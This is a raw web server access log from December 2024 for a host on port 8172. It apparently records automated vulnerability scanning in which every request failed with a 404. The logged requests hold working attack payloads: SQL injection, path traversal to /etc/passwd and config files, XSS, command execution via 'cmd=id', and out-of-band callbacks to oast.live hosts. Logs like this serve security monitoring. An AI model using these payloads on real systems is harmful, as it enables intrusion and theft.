103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/58.0.3029.110+Safari/537.36+Edge/16.16299 - 404 7 0 203 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 270 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Mobile/15E148+Safari/604.1 - 404 7 0 203 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0,+Win64,+x64,+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 202 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 219 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 - 404 7 0 222 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:104.0)+Gecko/20100101+Firefox/104.0 - 404 7 0 222 2024-12-12 21:15:16 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 7 0 313 2024-12-12 21:15:30 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+13.0)+AppleWebKit/617.28+(KHTML,+like+Gecko)+Version/17.0+Safari/617.28 - 404 7 0 202 2024-12-12 21:15:30 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.5.23 - 404 7 0 206 2024-12-12 21:15:30 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 218 2024-12-12 21:15:30 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:87.0)+Gecko/20100101+Firefox/87.0 - 404 7 0 217 2024-12-12 21:15:30 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 211 2024-12-12 21:15:30 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 205 2024-12-12 21:15:30 103.153.214.94 POST /CDGServer3/SystemConfig - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 216 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.20 - 404 7 0 202 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Tokai/21.1.294403+Version/17.2+Safari/605.1.15 - 404 7 0 204 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.6.20 - 404 7 0 205 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15-620 - 404 7 0 208 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 209 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 202 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.25 - 404 7 0 212 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.21 - 404 7 0 202 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 199 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 215 2024-12-12 21:16:06 103.153.214.94 GET /default/en_US/status.html - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.65 - 404 7 0 216 2024-12-12 21:16:10 103.153.214.94 GET /HelpTheHelpDesk.jsdbx - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/618.5.10+(KHTML,+like+Gecko)+Version/17.5+Safari/618.5.10 - 404 7 0 30 2024-12-12 21:16:10 103.153.214.94 GET /RestAPI/ImportTechnicians - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 67 2024-12-12 21:16:11 103.153.214.94 GET /snippets.inc.php search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 31 2024-12-12 21:16:13 103.153.214.94 GET /groovyconsole - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.130+Safari/537.36 - 404 7 0 56 2024-12-12 21:16:15 103.153.214.94 GET /webui/ g=sys_dia_data_down&file_name=../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/19.0.0+Version/17.2+Safari/605.1.15 - 404 7 0 32 2024-12-12 21:16:17 103.153.214.94 GET /etc/groovyconsole.html - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 40 2024-12-12 21:17:01 103.153.214.94 GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo url=https://ctcj3jjbclslbev4n7q09ejj9tdz6qkpg.oast.live 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_6_8)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/28.0.1500.44+Safari/537.36 - 404 7 0 37 2024-12-12 21:17:53 103.153.214.94 GET /setup/setupcluster-start.action - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/116.0 - 404 7 0 33 2024-12-12 21:17:53 103.153.214.94 GET /_config - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 21:19:05 103.153.214.94 GET /admin/ - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 208 2024-12-12 21:20:10 103.153.214.94 GET /show_operations.jsp Fronsetia_WSDL=%22%3E%3Cimg%2Bsrc%3Dx%20onerror%3Dalert(document.domain)%3E 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.7.20 - 404 7 0 83 2024-12-12 21:21:41 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 204 2024-12-12 21:22:10 103.153.214.94 GET / option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.5.23 - 404 7 0 68 2024-12-12 21:22:52 103.153.214.94 GET /OS/startup/restore/restoreAdmin.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 21:22:54 103.153.214.94 GET /AdminPage/conf/runCmd cmd=id 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 34 2024-12-12 21:24:27 103.153.214.94 POST /login - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 205 2024-12-12 21:24:27 103.153.214.94 POST /login - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 https://bcvt.kontum.gov.vn:8172 404 7 0 211 2024-12-12 21:25:08 103.153.214.94 GET /Business/DownLoad.aspx p=UploadFile/../Web.Config 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 21:26:35 103.153.214.94 GET / url=<img/src="http://ctcj3jjbclslbev4n7q0rysrkkjmn3ydh.oast.live"> 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 33 2024-12-12 21:26:55 103.153.214.94 GET /file valore=../../../../../windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 36 2024-12-12 21:27:05 103.153.214.94 GET /openam/oauth2/..;/ccversion/Version - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:105.0)+Gecko/20100101+Firefox/105.0 - 404 5 0 33 2024-12-12 21:27:06 103.153.214.94 GET /nagiosql/admin/info.php key1=%27%20union%20select%20concat(md5(2049327431))%23 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.27 - 404 7 0 55 2024-12-12 21:27:07 103.153.214.94 POST /api/tokens - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.27 bcvt.kontum.gov.vn:8172 404 7 0 199 2024-12-12 21:27:39 103.153.214.94 GET / subreddit=news&score=2134%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 61 2024-12-12 21:28:10 103.153.214.94 GET /fuel/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_7_9)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.4+Safari/605.1.15 - 404 7 0 216 2024-12-12 21:28:37 103.153.214.94 GET / layout=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 62 2024-12-12 21:28:57 103.153.214.94 GET /ftpsync.settings - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.5.2+Safari/605.1.15 - 404 7 0 41 2024-12-12 21:29:16 103.153.214.94 GET /nacos/v1/auth/users pageNo=1&pageSize=9 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 45 2024-12-12 21:29:20 103.153.214.94 GET /v1/auth/users pageNo=1&pageSize=9 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:83.0)+Gecko/20100101+Firefox/83.0 - 404 7 0 32 2024-12-12 21:29:44 103.153.214.94 GET /apt/v1/context - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:76.0)+Gecko/20100101+Firefox/76.0 - 404 7 0 206 2024-12-12 21:30:24 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36+Edge/15.15063 - 404 7 0 198 2024-12-12 21:30:24 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.24 - 404 7 0 198 2024-12-12 21:30:25 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 21:30:25 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 246 2024-12-12 21:30:49 103.153.214.94 GET /user_secrets.yml - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 39 2024-12-12 21:30:53 103.153.214.94 GET /user_secrets.yml.old - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 30 2024-12-12 21:31:45 103.153.214.94 GET /wp-content/plugins/zip-attachments/download.php za_file=../../../../../etc/passwd&za_filename=passwd 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/58.0.3029.110+Safari/537.36+Edge/16.16299 - 404 7 0 62 2024-12-12 21:32:22 103.153.214.94 GET /script/ - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 21:32:28 103.153.214.94 GET /jenkins/script - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.24 - 404 7 0 74 2024-12-12 21:32:55 103.153.214.94 GET /manage/log/view filename=/windows/win.ini&base=../../../../../../../../../../ 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 58 2024-12-12 21:33:00 103.153.214.94 GET /log/view filename=/windows/win.ini&base=../../../../../../../../../../ 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:82.0)+Gecko/20100101+Firefox/82.0 - 404 7 0 39 2024-12-12 21:33:03 103.153.214.94 GET /manage/log/view filename=/etc/passwd&base=../../../../../../../../../../ 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.27 - 404 7 0 30 2024-12-12 21:33:04 103.153.214.94 GET /wp-config.php-backup - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.0.3396.99+Safari/537.36 - 404 7 0 57 2024-12-12 21:33:07 103.153.214.94 GET /log/view filename=/etc/passwd&base=../../../../../../../../../../ 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 37 2024-12-12 21:33:08 103.153.214.94 GET /� - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:94.0)+Gecko/20100101+Firefox/94.0 - 404 12 0 31 2024-12-12 21:33:14 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Safari/605.1.15 - 404 7 0 211 2024-12-12 21:33:27 103.153.214.94 GET /wp-content/plugins/usc-e-shop/functions/progress-check.php progressfile=../../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 32 2024-12-12 21:33:27 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 53 2024-12-12 21:33:32 103.153.214.94 GET / page=step_1 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 85 2024-12-12 21:33:54 103.153.214.94 GET /wp-content/plugins/insert-php/readme.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/90.0.4430.93+Safari/537.36 - 404 7 0 57 2024-12-12 21:33:56 103.153.214.94 POST /ws/v1/cluster/apps/new-application - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 44 2024-12-12 21:35:35 103.153.214.94 GET / lang=../../thinkphp/base 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 21:35:39 103.153.214.94 GET / lang=../../../../../vendor/topthink/think-trace/src/TraceDebug 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 37 2024-12-12 21:35:57 103.153.214.94 POST /htdocs/login/login.lua - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:101.0)+Gecko/20100101+Firefox/101.0 - 404 7 0 224 2024-12-12 21:35:58 103.153.214.94 POST /index/login.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.130+Safari/537.36 - 404 7 0 225 2024-12-12 21:36:12 103.153.214.94 GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.65 - 404 7 0 43 2024-12-12 21:37:19 103.153.214.94 GET /components/statestore - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.4.21 - 404 7 0 42 2024-12-12 21:37:22 103.153.214.94 GET /overview - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 21:37:26 103.153.214.94 GET /controlplane - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WebView/3.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 - 404 7 0 31 2024-12-12 21:37:50 103.153.214.94 GET /core/config/databases.yml - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 105 2024-12-12 21:37:56 103.153.214.94 GET /admin+/db - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 0 0 99 2024-12-12 21:37:58 103.153.214.94 GET /portal/itc/attachment_downloadByUrlAtt.action filePath=file:/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 57 2024-12-12 21:38:02 103.153.214.94 GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php file=../../../wp-config.php 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.35 - 404 7 0 33 2024-12-12 21:38:51 103.153.214.94 GET /wp-content/plugins/mypixs/mypixs/downloadpage.php url=/etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.24 - 404 7 0 39 2024-12-12 21:39:18 103.153.214.94 POST /teamserver/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+\(Windows+NT+10.0\;+Win64\;+x64\)+AppleWebKit/537.36+\(KHTML,+like+Gecko\)+Chrome/100.0.4896.60+Safari/537.36 - 404 7 0 218 2024-12-12 21:39:18 103.153.214.94 POST /decisioncenter/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 21:39:53 103.153.214.94 GET /fw.progrss.details.php popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 35 2024-12-12 21:39:54 103.153.214.94 GET /ad-list-search keyword&keyword&lat&lat&long&long&location&category 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 57 2024-12-12 21:42:33 103.153.214.94 GET /plugins/servlet/snjCustomDesignConfig fileName=../dbconfig.xmlpasswd&fileMime=$textMime 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.5.26 - 404 7 0 33 2024-12-12 21:42:43 103.153.214.94 GET /index.php option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.24 - 404 7 0 44 2024-12-12 21:42:54 103.153.214.94 POST /res/j_security_check - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 217 2024-12-12 21:44:17 103.153.214.94 GET /interlib/report/ShowImage localPath=etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.15 - 404 7 0 36 2024-12-12 21:44:17 103.153.214.94 GET /index.php option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.17 - 404 7 0 49 2024-12-12 21:44:22 103.153.214.94 GET /interlib/report/ShowImage localPath=C:\Windows\system.ini 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:12.0)+Gecko/20100101+Firefox/12.0 - 404 7 0 32 2024-12-12 21:44:51 103.153.214.94 GET /api/get-users p=123&pageSize=123 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/83.0.4103.61+Safari/537.36 - 404 7 0 32 2024-12-12 21:44:51 103.153.214.94 GET /widgets/knowledgebase topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.26 - 404 7 0 54 2024-12-12 21:44:57 103.153.214.94 GET /index.php c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5(999999999)%27 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:92.0)+Gecko/20100101+Firefox/92.0 - 404 7 0 51 2024-12-12 21:46:02 103.153.214.94 GET /login - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 198 2024-12-12 21:46:26 103.153.214.94 GET /tarantella/cgi-bin/secure/ttawlogin.cgi/ action=start&pg=../../../../../../../../../../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.6.19 - 404 7 0 38 2024-12-12 21:47:18 103.153.214.94 